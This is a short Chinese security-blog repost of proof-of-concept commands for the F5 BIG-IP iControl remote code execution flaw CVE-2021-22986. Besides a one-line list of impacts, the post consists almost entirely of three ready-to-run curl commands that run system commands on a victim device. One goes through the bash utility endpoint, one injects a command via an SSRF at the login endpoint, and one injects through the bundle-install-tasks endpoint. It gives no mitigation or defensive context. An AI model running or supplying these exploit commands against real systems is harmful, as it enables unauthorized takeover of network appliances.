F5 BIG-IP iControl RCE (CVE-2021-

admin 2021年5月7日21:58:26评论67 views字数 611阅读2分2秒阅读模式
F5 BIG-IP iControl RCE (CVE-2021-22986)

execute arbitrary system commands
create or delete files
disable services

PoC #1
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

PoC #2
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

PoC #3


curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'



来源:https://twitter.com/wugeej/status/1372392693989445635

本文始发于微信公众号(安全鸭):F5 BIG-IP iControl RCE (CVE-2021-

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月7日21:58:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   F5 BIG-IP iControl RCE (CVE-2021-http://cn-sec.com/archives/295558.html

发表评论

匿名网友 填写信息